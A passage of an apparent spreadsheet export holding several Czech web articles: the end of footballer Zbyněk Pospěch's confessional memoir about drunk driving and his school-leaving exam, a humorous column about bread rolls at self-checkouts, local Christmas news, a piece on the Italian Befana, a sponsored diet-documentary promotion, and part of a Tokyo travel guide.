stát, že se můžu někde vybourat, někoho srazit, zabít. Vůbec. Zodpovědnost nulová. Těch nějakých dvě stě kilometrů z Opavy do Brna byly jenom překážkou k překonání, abych se totálně zničený po dvou nocích beze spánku dostal k maturitní zkoušce. Tak jsem se vymotal z Bludičky, baru, kde jsme seděli, sednul do auta půjčeného od bratrance, stavil se domů pro nějaké sako a vyrazil. Čefon mi cestou několikrát volal, jestli žiju a nevysekal jsem se, ale já na pohodu před devátou parkoval v Králově Poli, oholil se v autě a rozevlátý, úplně rozbitý vykročil. Když mě tam Karel Jarůšek viděl, jen na mě syknul, jestli si dělám prdel. Já na něj: „Tréňo v klidu, to se zvládne.“ Na chodbě, kde byli všichni vystresovaní, jsem si sednul vedle hokejisty Jirky Hunkese, potvrdili jsme si navzájem, že nic neumíme a je to v prdeli, co budeme dělat… „No snad je to nějak domluvený,“ chechtal jsem se. „ Pospěch !“ ozvalo se do toho ze dveří. Tak tam vlezu, vysmátý, ale přede mnou usazená komise a tváří se vážně, že si mám vybrat číslo otázky. Aha, pozor, tak ono to je jako vážně… Najednou mi došlo, že to není, že jen přijedu někam něco podepsat a bude hotovo. Tak jsem si vytáhnul mistra Jana Husa a jak jsem sednul na potítko, všechno na mě padlo. Úplně ztracený, že. Přesně podle úrovně své přípravy a stavu, v jakém jsem dorazil. Na papíře samozřejmě nula. Navíc ti lidi věděli, že jsem tam ani nechodil, že, jeden z těch učitelů mi hned říkal: „Vás vidím poprvé.“ Na moje konstatování, že Jan Hus umřel 1415 v Kostnici, což jsem z paměti vylovil, reagoval, že to jsem teda docela přeskočil. Další čtvrthodinu mi tam odvyprávěli život Jana Husa , což já občas doplnil nějakou holou větou nebo pokýváním a na konci mi řekli, že to mám za čtyři. To snad ne… tak to je v pohodě! Jestli tohle je za čtyři, tak to prostě musím udělat, to není možný abych tohle nezvládnul. Na účetnictví jsem si něco pamatoval ze školy. Na ekonomice jsem dostal otázku, co to jsou peníze, a to jsem přece věděl, protože jsem už vydělával prachy, že? A nakonec matika, logaritmy, kde jsem absolutně netušil, která bije. Tak za mnou na potítko přišla frajerka a vypočítala mi jeden ze dvou zadaných příkladů, a já na ni civěl jak pitomý. Úplně vidím, jak jsem to pak psal suverénně na tabuli a výsledek ještě frajersky podtrhnul s vědomím, že jsem borec, že to mám, víš jak. Místo, abych dostal přes držku, jak si dovoluju v takovým stavu přijet do školy, kam jsem ani nechodil, jsem za chvíli volal Čefonovi, že jsem to udělal za 13. V poledne jsem vyrazil zpátky domů s maturitou v kapse. Zase jsem to všechno proplul, aniž bych dostal zjebáno, aniž by mi někdo vysvětlil, že tohle je špatně. Aniž by mi prostě řekli, že jsem kretén a ať se proberu, že takhle to nejde. Ne. Všichni se jděte bodnout, já se v pět ráno sbalil od automatů a nalitý si dojel do Brna udělat maturitu. A ještě jsem se vrátil jako vítěz. Jako borec, pro kterého není nic problém. Nezastavitelný frajer. V hloubi duše jsem samozřejmě věděl, že všechno tohle je špatně. Jezdit ožralý, proplout maturitou, kterou se nedalo neudělat… Ale prostě mi to procházelo, tak co? Hned jsem zase začal řešit jenom fotbal a všechno mi bylo jedno. Vždyť já už tenkrát i jezdil bez řidičáku, ten mi vzali asi po čtrnácti dnech, co jsem si ho udělal. Byli jsme na nějakém zápisném, kam bral auto spoluhráč. Jenže ten asi dva týdny nazpátek nešťastně srazil chodce, který mu vlezl do cesty. S tímhle škraloupem chtěl ten kluk nalitý řídit i tentokrát a já frajer jsem mu řekl, ať neblbne, že mám nový řidičák, tak to odřídím, ať nemá průser, kdyby ho hned chytli. Místo toho chytli mě, jak s 1,4 promile vezu auto plné spoluhráčů, že. Tak jsem odevzdal řidičák, ale přece nebudu chodit pěšky, víš jak. Když mě pak jednou chytli za rychlost, měl jsem v kufru nějaké prospekty a stulpny, něco jsem jim dal, pokecali jsme o fotbale a pustili mě. Štěstí. Zase nesmyslné štěstí, kdy jsem to uhrál na to, že jsem ten borec, kterého každý v Opavě zná. Ani policajti mi nedali signál, že takový král nejsem. Proplul jsem. Nějak se to udělalo. Podruhé zrovna tak, to už jsem jezdil do Liberce . Měli jsme zrovna volný víkend, který jsem doma strávil kalbou v pátek i sobotu a v noci na neděli jsem vyrazil rovnou na ranní trénink. Po cestě jsem se někde na odpočívadle prospal, že. Trošku jsem samozřejmě potom chvátal, navíc jsem byl pořád celkem rozbitý. A kousek před Libercem , u Turnova , červené světýlko. Ty vole, tak teď je průser. Ožralý, bez řidičáku, to je konečná, říkám si a nevím, co budu dělat, zatímco jsem stahoval okénko. Na sedadle spolujezdce poházené všechny ty prázdné redbully. „Pane řidiči, kam tak chvátáte,“ ptá se mě policajt. Odpovídám, že na trénink. Načež jsme se dostali do debaty, za co hraju. „Fotbal za Liberec .“ „Za Liberec , jo? Sundejte tu kšiltovku… Áááá, pan Pospěch . Já vám fandím, hrajete skvěle, super, že vedete ligu.“ A já na to, že se omlouvám, že fakt spěchám, víte. „Počkejte, vyřešíme toho před váma a pak jeďte. Ať se vám daří.“ V tu chvíli jsem, přiznávám, ani já vůbec nechápal, jak jsem z toho zase vyváznul. Jak jsem zase utekl před jakoukoliv zodpovědností. Byl jsem z toho zážitku tak vystresovaný, že jsem tenkrát dojel do Liberce na byt a zavolal trenérovi Víťovi Lavičkovi, že jsem se vzbudil s teplotou a potřebuju si dát oraz. A on mi to volno dal, nepodezíral mě. Tenkrát jsem si lehnul a jak ze mě všechno spadlo, usnul jsem jak mimino. Řídit v opilosti je samozřejmě úplná debilita, že, jenom čekání na opravdovej průser. Ale zvlášť tenkrát v Liberci to bylo úplným standardem. My si připadali nesmrtelní, ožralí jsme řídili pořád. Rozhodně já a minimálně pár kluků, nebudu jmenovat. Vždycky jsme jenom slyšeli: „Až vás chytnou, vole…“ Ale nechytili nás nikdy. A i kdyby se to stalo, stejně jsme měli pocit, že by se to nějak vyřešilo. Někdo by někam zavolal, někdo by někde něco zaplatil a bylo by to v klidu. Tak jako se to vždycky dělo mně. Vůbec jsem si nepřipouštěl, že se může něco stát, že můžu někoho srazit, zabít. Já si nepřipadal jako normální člověk. Ve svých očích jsem byl nadřazený, nedotknutelný. V další části příběhu se také dozvíte... Jak Zbyněk naložil s milionem, který dostal na ruku od sparťanského šéfa Pelty. Co se dělo po trénincích v mistrovské sezoně Liberce . Čím ve Spartě naštval trenéra Grigu? Jaký přestup rozjel spirálu problémů, které ho poslaly do obřích dluhů a závislosti na sázkách? Jak to bylo s neslavnou bouračkou v Brně ? Proč nemohl skoro rok ve svých nejlepších letech hrát fotbal? Co skandoval slávistický kotel, když se dozvěděl, že měl Zbyněk napadnout svoji ženu a tchyni? Díky čemu se odhodlal nastoupit na léčení? Jak se jeho ego pralo s realitou bohnické léčebny? Jakou otázku si dodnes klade? Přihlásit se Vstoupit do Klubu Rozuzlení si přečtou jen členové Klubu Bez frází Za 199 Kč měsíčně na vás čeká pointa tohoto i spousty dalších inspirativních příběhů, jedinečné texty plné souvislostí od respektovaných autorů, podcasty a setkání s osobnostmi. Sportovní svět tak, jak ho jinde nenajdete. Vstoupit do Klubu Inspirativní příběhy vyprávěné výjimečnými sportovci, jedinečné texty od novinářských osobností plné překvapivých souvislostí, podcasty nabité informacemi a setkání s osobnostmi. Pohled na sportovní svět tak, jak ho jinde nenajdete. Předplatné Ročně (2 měsíce zdarma) - 1 990 Kč E-mail Cena: Jakub Mareš , CNC/Profimedia/ Michal Beránek a Jaroslav Legner, ČTK / Martin Salajka Martin a Radek Petrášek a archiv Zbyňka Pospěcha Oslovil Vás tento příběh? Sdílejte jej bez frází Zbyněk Pospěch Rubrika transition_slide fotbal</t>
  </si>
  <si>
    <t>20241201_120_3476768254_1087224cb2b425203337.html</t>
  </si>
  <si>
    <t>1087224cb2b425203337</t>
  </si>
  <si>
    <t>Vraťte mi rohlík na obrazovku do rychlé volby</t>
  </si>
  <si>
    <t>Vraťte mi rohlík na obrazovku do rychlé volby Vzpomínáte na staré dobré časy, kdy jste přišli do samoobslužného obchodu, strčili jste rohlík na váhu a on se na obrazovce objevil jako první? Byl to zázrak moderní technologie, kdy se rohlík – ten věčný symbol českého snídaňového luxusu – stal králem rychlé volby. Rohlík byl tam, kde měl být. Bez dlouhého hledání, bez bloudění v chaotických kategoriích. Prostě: „šup“ a byl tam. Ale co se to stalo? Kde je teď? Není. Rohlík zmizel. Pryč z rychlé volby. Pryč z našich srdcí. Pryč z obrazovky. Máte chuť na rohlík? No, tak pěkně mazejte do podkategorie „Pečivo“ a hledejte, dokud nenajdete. A ne, nepomůže ani napsat „rohlík“ do vyhledávače. Systém na vás jen zírá jako ten nejhorší obchoďák, který na otázku: „Kde máte rohlíky?“ odpoví: „Zeptejte se někoho jiného.“ Proč rohlík zmizel? Co provedl, aby si to zasloužil? Je snad problém, že stojí pár korun? Některé teorie tvrdí, že rohlík byl odstraněn, aby nás donutil přemýšlet o našem spotřebitelském chování. Jiní říkají, že to byl špinavý plán bagety, která chtěla získat více pozornosti. Věřím tomu? Nevím. Ale vím jedno: když se vracíte z práce, hladoví jako vlk a potřebujete rychlou volbu, rohlík vám chybí. A to bolí. Když jsem to zjistil poprvé, byl to šok. Přijdu k samoobslužné pokladně, položím rohlík na váhu a očekávám okamžitou gratifikaci. Ale ne, obrazovka jen mlčí. Přehrabuju se kategoriemi. Ovoce? Zelenina? Omylem kliknu na „Chlazené“. Nic. Nakonec najdu pečivo a rohlík tam je, ale ne bez úsilí a slz. Cítím se, jako bych hledal ztracený poklad, ne obyčejný rohlík. A teď se podívejme na to z filozofického hlediska. Není to vlastně dokonalá metafora moderního života? Jednoduché věci, které by měly být snadné, se stávají složitými. A zatímco se honíme za svými rohlíkovými sny, svět se točí dál, chaos roste a obrazovky nám stále dokola ukazují zbytečnosti. Kdo potřebuje rychlou volbu pro loupák, když tam může být náš rohlík? Jako národ, který na rohlíku vyrostl, si zasloužíme víc. Rohlík není jen pečivo. Je to životní styl. Je to ta první věc, kterou děti jedí po školním plavání. Je to základ každé pořádné chlebíčkové hostiny. A je to věc, kterou chcete najít rychle, když spěcháte. Takže, milý obchodní řetězci, prosím: vraťte rohlík na obrazovku. Vraťte ho tam, kam patří. My, rohlíkoví bojovníci, jsme ochotni jít až na kraj světa – nebo aspoň do sekce „Pečivo“ – ale to neznamená, že bychom měli. Dejme rohlíku zpět jeho čest a nám zpět naše rychlé volby. A jestli vám to nepřijde dostatečně důležité, tak se zamyslete: když rohlík zmizí z rychlé volby, co bude dál? Housky? Jogurty? Možná i pivo ? A to už by byla opravdu katastrofa.</t>
  </si>
  <si>
    <t>20241201_121_3476823443_1e8655124024ef86a1f1.html</t>
  </si>
  <si>
    <t>1e8655124024ef86a1f1</t>
  </si>
  <si>
    <t>„Španěl“ v Uničově svítí. Město má netradiční jméno vánočního stromu</t>
  </si>
  <si>
    <t>„Španěl“ v Uničově svítí. Město má netradiční jméno vánočního stromu Horké punče či mošty tekly proudem. Průměrně za ně v Uničově zaplatíte i s malým panákem tvrdého alkoholu 70 korun, za svařák dáte o dvacku méně. Lidé stáli dlouhé fronty u tří stánků a čekali na hlavní událost podvečera. Ještě předtím, vystoupily děti z uničovský mateřských škol, které ozdobily také malé stromečky, jenž budou vystaveny okolo Mariánského sloupu. Zájemci se mohli zabavit pouštěním dobročinných lodiček, za které zaplatili 20 korun a výtěžek poputuje na dobrou věc. K tomu pobíhal mezi lidmi sněhulák, s nímž se fotili nejen malí, ale také velcí. Všichni mohli obdivovat vedle stromečku také řezbářské dílo pana Halouzky z Jiříkova , který je betlém plný dřevěných zvířátek a měl by na náměstí zůstat až do Vánoc. Vánoční náměstí v Uničově | Video: Michal Muzikant Okolo 17. hodiny dorazil na pódium starosta Uničova Radek Vincour, aby uvedl rozsvícení velkého stromu. Ten má 35 let a dorazil z Chabičova. Lidé mohli hlasovat na webových stránkách města o jméně stromu. A vyhrálo netradiční - Stromísek Pedro, což může evokovat španělskou národnost. V anketě získal tento název 653 hlasů a o více než 200 hlasů porazil Rolničku. Ve hře byla také jména jako Štědránek, Radostníček, Třpytka či Jiskřička. „Děti mají radost, což je hlavní. Ale myslím, že takové jméno už nikdy nikdo opakovat nebude,“ říkal starosta Radek Vincour. Vánočně nazdobené náměstí v Uničově | Video: Michal Muzikant Po rozsvícení, které provázelo chvíli drobné mrholení, byly slyšet na vzhled Stromíska Pedra jen superlativy. „Možná i hezčí než v Brně ,“ pronesla jedna studentka, která ve druhém největším městě Česka studuje a také tamní vánoční strom na Náměstí Svobody obdivovala. Kromě velkého vánočního stromu navíc uničovskému náměstí přidají také ozdobené a rozsvícené malé stromky po celém obvodu, což navodí pravou vánoční atmosféru. Autor: Michal Muzikant Autor person Michal Muzikant</t>
  </si>
  <si>
    <t>29950</t>
  </si>
  <si>
    <t>14780</t>
  </si>
  <si>
    <t>20241201_122_3476753672_8fde62e2f65228168d7c.html</t>
  </si>
  <si>
    <t>8fde62e2f65228168d7c</t>
  </si>
  <si>
    <t>Čarodějnice Befana</t>
  </si>
  <si>
    <t>Čarodějnice Befana Z 5. na 6. ledna obchází Itálii čarodějnice Befana a komínem hází dětem drobné dárky, většinou různé ovoce a sladkosti. Někde jsem se dočetla, že v Itálii mají místo Ježíška a Santy na Vánoce čarodějnici. Tak to ale není. Na Vánoce naděluje Babbo Natale , což je taková italská obdoba amerického Santy. V současné době bývá i stejně zobrazován, jako starý muž s bílým plnovousem, oblečený v červeném kabátě a s červenobílou čapkou na hlavě. Befanu bych spíš přirovnala k našemu Mikuláši. V období Mikuláše ale Itálií rezonují oslavy sv. Lucie , pak jsou Vánoce a nakonec, aby to dětem nebylo málo, přilétá ošklivá, ale hodná Befana. Pověst praví, že Tři králové cestou za Ježíškem potkali právě čarodějnici Befanu. Žádali ji o radu, kudy jít za právě vyšlou betlémskou hvězdou. Befana ale poradit nedokázala, tak jim aspoň nabídla svoji pohostinnost a přespání. Druhý den ji požádali, aby šla za Jezulátkem spolu s nimi. Befana ale měla hodně práce, tak odmítla. Řekla, že vyrazí později a na cestě je dožene. Když se konečně vypravila na cestu, Tři krále už nenašla. A nenašla ani cestu k Ježíškovi. Od té doby putuje světem a hledá Ježíška, aby mu předala své dárky. Protože ale neví, kde ho hledat, dává právě na svátek Tří králů dárky všem dětem. Protože, co kdyby některé z těch dětí bylo to pravé, které hledá. Befana je většinou zobrazována jako odraná, špinavá a ošklivá čarodějnice na létajícím koštěti. Často se šátkem, nebo odraným kloboukem na hlavě a košem plným sladkostí, připravených pro Jezulátko. Na svátek Epifanie (ze jména Epifania je Befana odvozená) pro ni rodiny nechávají u krbu nebo za oknem trochu jídla a sklenku dobrého vína . Děti pak ráno na místě najdou sladkosti a drobné dárky, pokud ale zlobily, tak najdou uhlí a cibuli. Také se traduje, že pokud Befanu někdo uvidí, místo dárků dostane ránu jejím koštětem, protože si nepřeje být viděna. Befana tedy není přímo spjatá s Vánoci, ale ukončuje sváteční období a je přechodem ze svátků do běžného života. Svatá Lucie sváteční období začíná, Befana ho ukončuje. Její příběh také symbolizuje důležitost štědrosti, laskavosti a pohostinství. Svátky jsou zatím stále ještě před námi, tak se můžeme zastavit, nadechnout a užít si každou minutu s těmi, které máme rádi a třeba i projevit trochu štědrosti vůči těm, co takové štěstí neměli. A můžeme tak nasávat sváteční atmosféru od svaté Lucie do Epifanie a Tří králů.</t>
  </si>
  <si>
    <t>20241201_123_3476724365_239ea9b68d72ac4a215d.html</t>
  </si>
  <si>
    <t>239ea9b68d72ac4a215d</t>
  </si>
  <si>
    <t>Moje restart menu: dokumentární film, který zkoumá skutečné příčiny civilizačních chorob a otevírá nové cesty ke zdraví</t>
  </si>
  <si>
    <t>Moje restart menu: dokumentární film, který zkoumá skutečné příčiny civilizačních chorob a otevírá nové cesty ke zdraví Civilizační choroby, jako jsou srdeční onemocnění, mrtvice a diabetes 2. typu, jsou podle Světové zdravotnické organizace ( WHO ) jedním z největších zdravotních rizik moderní doby. Přitom by až osmdesáti procentům těchto případů šlo předejít úpravou stravy a životního stylu. „Moje restart menu“ – nový dokumentární film Adama Janaty a Pavla Orsága – přináší osobní experiment, který se kriticky ptá: Může změna jídelníčku skutečně léčit civilizační nemoci, nebo je problém někde úplně jinde? Tento snímek ukazuje divákům zdravotní revoluci ve stylu slavného „Super Size Me“ – tentokrát ovšem zaměřenou na ozdravné a dlouhodobě udržitelné přístupy. Foto: Adam Janata Jak to začalo? Adam Janata, osmadvacetiletý autor dokumentu, má na kontě celou řadu onemocnění - astma, epilepsii, metabolický syndrom, úzkosti, panické ataky, vysoký krevní tlak a mnoho dalších. Projevy nemocí mu začínají komplikovat život a proto se rozhodl svůj zdravotní stav aktivně řešit. Pod dozorem odborníků a lékařů sestavil léčebný experiment, ve kterém se pokusí dostat ze svých nemocí změnou jídelníčku. „ Každý den zápasím se svým tělem a psychikou, už je to neúnosné, nemohu si ani pořádně užívat společný čas se svou dcerou… Další léky na potlačení symptomů jsem odmítl, protože je to začarovaný kruh a neřeší příčinu mých nemocí. Aktivní změna životního stylu je tak moje poslední šance, jak tu být aktivní pro svou rodinu “. Autor dokumentu se rozhodl podělit o svůj osobní příběh a inspirovat ostatní. „ Když už jsem se odhodlal ke změně a začal jsem se zajímat o možnosti léčby, zjistil jsem, že řeším velké, důležité a neprobádané téma. Nakonec jedna z hlavních motivací ke vzniku filmu byla ta, že jeho vznikem mohu pomoci nejen sobě “. Foto: Adam Janata Experiment, který již přináší výsledky Adam v první fázi experimentu vyřadil z jídelníčku pouze vysoce průmyslově zpracované potraviny, rafinované cukry, alkohol a levné rostlinné oleje (slunečnicový, řepkový, palmový). Bez extrémních diet či restrikcí upravil svou stravu k základním a přirozeným surovinám – a výsledky přišly dříve, než očekával. Již po prvním měsíci této změny zaznamenal výrazný pokles krevního tlaku (z deního průměru 156/94 sníženo na 131/87 mmHg), hladiny cukru v krvi a dokonce i zlepšení jaterních testů. Spánek se zklidnil a dostavil se i úbytek na váze (4,5 kg). Navzdory tomu, že první měsíc experimentu byl veden bez jakékoli pohybové aktivity, došlo ke zlepšení metabolického syndromu, obezity a vysokého krevního tlaku. Sám Adam Janata říká: „ Určitě se cítím lépe! Zároveň na svém těle snad poprvé v životě pozoruju, že si samo říká o pohyb “. Foto: MUDr. Marcela Matoušová/ MUDr. Karolína Poledníková „ Je ohromující, jak i malá změna může vést ke zlepšení zdravotního stavu. Chci najít udržitelný způsob, jak se postupně uzdravit, a inspirovat lidi, aby i oni našli cestu z chaosu dezinformací o zdraví, výživě a životním stylu, “ říká Adam Janata. Jeho slova se opírají o zkušenosti a výroky odborníků. Výživový specialista Petr Havlíček, jeden z mentorů projektu, varuje před tím, jak nebezpečné je nechat své tělo ovládat průmyslově zpracovanými potravinami: „ Vyhoďte je ze svého jídelníčku a orientujte se na skutečné potraviny, které vám přináší pozitivní emoci. Opravdový přítel nad vámi nepřevezme kontrolu, ale pomáhá vám. “ A menátlní kouč Marian Jelínek dodává: „ Spousta lidí nemá emoční vazbu k tomu, aby milovali zdravý životní styl. Nezajímá je cesta, ale výsledek. “ Foto: Marian Jelínek Plán další fáze: Návrat do minulosti a hledání inspirace pro městský život Adam Janata se chystá v experimentu pokračovat. V další fázi se chce vrátit „ke kořenům“ a vyzkoušet si, jak může změnit své zdraví a pohodu pobytem na farmě, kde bude jíst a žít tak, jak to bylo běžné pro naše předky. „ Jedna z mála věcí, na které se většina odborníků shodne je ta, že dnes žijeme v pro člověka nepřirozeném prostředí, kdežto takový sedlácký způsob života tu byl tisíce let a člověk je na to zvyklý - fyzická práce, kvalitní domácí suroviny a bez závislosti na telefonu, “ říká Adam Janata. Tento návrat do minulosti se stane inspirací pro další etapu, ve které by Adam chtěl zjistit, jak lze přirozené návyky a poznatky z farmářského života přenést do prostředí velkoměsta a udržet se zdravým i v sedavém zaměstnání. Adamova cesta není o rychlých změnách, ale o hledání rovnováhy a udržitelného způsobu života, jak sám říká: „ Nejde mi o to něco rychle a radikálně změnit, protože takové plány vždycky selhaly. Chci objevit cestu, která mi umožní žít zdravě dlouhodobě. “ Foto: Adam Janata Proč podpořit vznik filmu? „Moje restart menu“ přináší osvětovou sondu do problematiky zdravého životního stylu a civilizačních nemocí, která se týká každého z nás. V oblasti zdraví se často setkáváme s pseudo odborníky, nejasnými informacemi a mýty, které mnohdy podporují zájmy velkých společností a finanční zisk. Dokument si klade za cíl tento chaos rozkrýt a pomoci lidem se více zorientovat v oblasti zdraví a prevence. Vznik filmu nabízí divákům reálnou a komplexní alternativu ke zdravotním problémům, kterým dnešní společnost čelí. „ Věřím, že film bude inspirací a pomocí pro všechny, kterým není jejich zdraví ukradené a chtějí udělat pozitivní změny ve svém životě a přitom zůstat nohama na zemi, “ dodává Janata. Vznik filmu je možné podpořit na platformě Donio. Za podporu autoři nabízejí originální a limitované odměny. Každý příspěvek se stane krokem k šíření důležitých informací a ke změně, na které záleží. VÍCE O PROJEKTU: donio.cz/moje-restart-menu Reklama Autor: Autor: | Komerční článek Rubrika transition_slide Zdraví</t>
  </si>
  <si>
    <t>35830</t>
  </si>
  <si>
    <t>20241201_124_3476724136_2838d8869fdcdd46c9e6.html</t>
  </si>
  <si>
    <t>2838d8869fdcdd46c9e6</t>
  </si>
  <si>
    <t>Jak strávit 24 hodin v&amp;nbsp;Tokiu</t>
  </si>
  <si>
    <t>Jak strávit 24 hodin v&amp;amp;#160; Tokiu V japonské metropoli se minulost setkává s budoucností Můžu vám zaručit, že jste nikdy nenavštívili místo jako je Tokio. Místo, které ctí a uchovává minulost a zároveň je až nepředstavitelně obří metropolí, která představuje technicolorovou vizi budoucnosti. A ať už hledáte kulinářské nebo kulturní zážitky nebo jen chcete zažít nával chodců na křižovatce Šibuja, hlavní město Japonska vás nezklame. Mohli byste tu strávit celý rok a stejně byste tohle místo poznali jen povrchně. Jenže co když máte jen 24 hodin? Přinášíme vám tipy na jedno velmi rušné leč uspokojivé jednodenní dobrodružství. JAZYKOVÁ POZNÁMKA Přestože řada personálu v hotelech, restauracích a dalších službách obvykle hovoří anglicky, spousta Japonců angličtinu neovládá. Proto je dobré nainstalovat si do mobilu předem nějakou překladovou aplikaci a naučit se pár základních frází v japonštině, hlavně koničiva (dobrý den) nebo arigató (děkuji). Další užitečné fráze i s českým překladem najdete např. na serveru konoha.cz/jap/slovicka-l1. Přílet Pro přílet nabízí Tokio dvě možnosti. Mezinárodní letiště Narita (NRT) leží asi 60 kilometrů východně od města a je nejrušnějším japonským letištěm pro mezinárodní cestující. Letiště Haneda (HND) je mnohem blíže, jen nějakých 15 kilometrů jižně od centrálního nádraží Tokyo Station. Obě letiště přijímají přímé lety od hlavních dopravců z celého světa a z obou se dostanete do města velmi snadno. Nejrychlejší z Narity je vlak JR Narita Express, který spojuje letiště s hlavním nádražím v Tokiu asi za 55 minut. Jednosměrná jízdenka vás vyjde zhruba na 500 korun. Z Hanedy máte řadu způsobů, jak se dostat na hlavní nádraží, včetně jednokolejky, která byla postavena pro olympijské hry v roce 1964. Cesta trvá asi půl hodiny a stojí kolem stovky. Jednokolejka z mezinárodního letiště Haneda vás zavede přímo do srdce Tokia . (Flickr) Ráno I když bych normálně nedoporučoval poflakovat se po vlakovém depu jako první zkušenost v novém městě, Tokyo Station je perfektní místo, kde se po dlouhém letu občerstvit. 10 nejvytíženějších vlakových stanic světa se nachází v Japonsku a každý den touto majestátní budovou z červených cihel projde kolem 1,1 milionu lidí. Pod nádražní budovou se nachází rušné podzemní město. Ovšem pozor. V tom bludišti vzájemně propojených nákupních center není vůbec těžké se ztratit. Snídani si můžete předem prohlédnout, protože mnoho restaurací zde nabízí plastové modely různých lahodných pokrmů. Jednodušší a snazší je zamířit přímo na místo, o kterém víte, že je opravdu dobré, jako je Rokurinsha, kde se podává chutný ranní ramen v páře. CESTOVÁNÍ MIMO TOKIO V Japonsku mají jednu z nejrychlejších, nejefektivnějších železnic na světě. Šinkansen přenese pasažéry do jejich destinace rychlostí až 320 km/h. Plánujete-li cestovat mimo Tokio, opravdu se vyplatí koupit si železniční kartu Japan Rail Pass . S ní můžete neomezeně cestovat po zvolenou dobu (7, 14, 21 dní), což vám poskytne velkou flexibilitu. Ceny jsou však vysoké. Za 7denní kartu v ekonomické třídě zaplatíte 70 000 jenů (11 tisíc Kč). Když se nasytíte, vyrazte na krátkou procházku k císařskému paláci. V Tokiu samotném žije asi 14 milionů lidí a více než dvojnásobek jich bydlí v přilehlých částech na okraji. Ale přímo v tlukoucím srdci toho všeho, pár kroků do svěžího a upraveného areálu paláce, všechna ta rušnost zmizí. Projděte se přes příkopy po kamenných mostech. Komplex, který je stále domovem japonské královské rodiny, je ve skutečnosti relativně nový, když vezmete v úvahu starobylou povahu této země. Začali ho stavět v roce 1868, potom, co se sem přesunulo sídlo moci z Kjóta . Vše bylo přestavěno po bombardování ve druhé světové válce. Abyste se dostali za brány, budete potřebovat prohlídku s průvodcem, kterou je nejlepší rezervovat předem na webových stránkách Imperial Household Agency . Běží většinu dní v 10 a 13 hodin, trvá o něco déle než hodinu. Na rozdíl od prohlídek paláců v Evropě , kde vstupujete do vnitřních komnat dávných králů a královen, je zde stále aktivní sídlo císaře. Takže i když ve skutečnosti nevstoupíte do žádné budovy, krása areálu a fascinující informace od průvodců jsou dostatečným důvodem k návštěvě. Císařský palác můžete prozkoumat při prohlídkách s průvodcem. V paláci stále sídlí královská rodina. (Stramyk / Envato) Pokud toužíte po delším pohybu, vydejte se jen kousek na sever od paláce do Kitanomaru, národního parku . Tento zelený prostor byl kdysi domovem mocného klanu. Nyní jeho cesty, příkopy a rybník lákají každého, kdo hledá trochu čerstvého vzduchu. (Plus vědecké muzeum a Budokan , kde se konají soutěže bojových umění a některé velké koncerty.) Park je úžasný zejména na jaře, kdy kvetou třešně, a na podzim s listím hrajícím barvami. Kvetoucí třešně v parku Kitanomaru. (Dukas / Getty Images ) Park Kitanomaru je na podzim plný barevných listů. (Sanga Park / iStock / Getty Images) Odpoledne Už jen dostat se do cíle je v tomto městě opravdu zajímavý zážitek, zvláště pokud (jako já) milujete cestování ve vlacích. Tokijský tranzitní systém zahrnuje řadu různých společností, včetně JR a Metro. Desítky linek se připojují ke stovkám stanic a denně přesouvají mnoho milionů lidí. Když stojíte před mapou MHD, kaleidoskop barev, kruhů a polí může být odstrašující, ale jakmile ten systém pochopíte (možná s malou pomocí mapové aplikace v telefonu nebo užitečného zaměstnance), čeká vás fascinující jízda. Velké stanice jsou světy samy pro sebe. Na nástupištích stojí prodejní automaty na téměř vše, co si lze představit, od piva přes hamburgery až po trička a deštníky. A jakmile se dostanete na palubu, sledování lidí je jedním z nejlepších na světě. Je to levný způsob, jak nahlédnout do života obyčejných dojíždějících – krátké jízdy nestojí v přepočtu ani třicet korun. Mapa tokijského metra, které se rozprostírá po celém rozlehlém městě. (Atlantis Phototravel / Getty Images) Možná se budete chtít trochu projet, jen tak pro zábavu, rozhodně se však vydejte do Sensódži (Senso-Ji). Tento buddhistický chrám, který pochází z roku 645 našeho letopočtu, je nejstarší v Tokiu . Projděte mezi věřícími, přes Hromovou bránu a kolem svatyní a kotlíku pod pětipatrovou pagodou, z něhož vychází kouř z vonných tyčinek. Pokud hledáte suvenýr, tohle je ideální místo, kde si ho vybrat. Právě zde je Nakamise-dori, dlouhá nákupní ulice, kde si můžete vybrat cokoli od hraček Godzilla po kimona a jukaty (odlehčená letní verze tradičního hábitu). Protože budete mít časnou večeři, je to také skvělé místo na malou svačinu. Vyberte si ze stánků nabízejících ramen a sushi a další snadné, chutné pokrmy. Chrám Senso-ji ve čtvrti Asakusa je nejstarším chrámem v Tokiu . (Craig Pershouse / Getty Images) Až budete procházet kolem obřích luceren umístěných u bran chrámu Senso-ji, podívejte se nahoru. ( Jon Hicks / Getty Images) Teď je čas vydat se přes město, to trochu zabere. Jeďte JR nebo metrem a s jedním přestupem a za asi 30 až 40 minut dorazíte na nádraží Šindžuku (Shinjuku). Vystoupíte z vlaku na místě, které Guinessova kniha rekordů uznává jako nejrušnější vlakové nádraží na světě. Denně tudy projde více než 3,5 milionu lidí. Udělejte si chvilku na procházku po obrovském, nesourodém komplexu obchodů a restaurací a pociťte tlačenici každodenních pasažérů. Pak se toulejte po Shinjuku, čtvrti, která vyzařuje neon a energii. Dejte si před večeří drink v jednom ze stovek supermalých, rozpadajících se barů, které lemují úzké, vzájemně propojené uličky v Golden Gai. Je to místo rafinované, naprosto plné osobnosti (stejně jako spousta místních obyvatel), zastrčený kout města, který působí jako Tokio před desítkami let. Pak si dejte brzkou večeři v Omojde Jokočo (Omoide Yokocho neboli Pamětní ulička), další návrat do Japonské minulosti. Udělejte si trochu času na procházku po celé délce této těsné uličky. Přivoňte si k jakitori (yakitori), kuřecím špízům připravovaným pod širým nebem, které celou scénu zalévají lahodnou vůní. Skuteční odvážlivci si určitě najdou i další kulinářské vychytávky, včetně žabího sašimi (sashimi). Až budete připraveni k jídlu, nestyďte se probojovat se lokty k baru a přidejte se k davu po práci na kus něčeho dobrého. Atmosféra je pospolitá a přátelská a je to opravdu jedinečná příležitost potkat se s místními. Lidé si pochutnávají na občerstvení podél uličky Omoide Yokocho v Shinjuku. (tour japan) Pak je čas na baseball, zdaleka nejpopulárnější japonský sport. Představili ho Američané na konci 19. století a mnozí v této zemi dnes pro tuto hru žijí a dýchají. Japonsko samozřejmě vyprodukovalo Shohei Ohtaniho z LA Dodgers, jednoho z nejlepších hráčů, kteří kdy zvedli míč, pálku a rukavici. Sledování zápasu v této zemi je velkolepý zážitek, jaký byste na americkém hřišti nikdy nezažili. Zábava je nejenom hra na hřišti, ale také sledování vašich spoludiváků. Japonští fanoušci se zapojují do řady chorálů, kdykoli je jejich tým na pálce, často tlučou na bubny a hrajou na další hudební nástroje. I když Tokyo Dome je nejslavnějším stadionem v zemi, zkuste si zajít na stadion 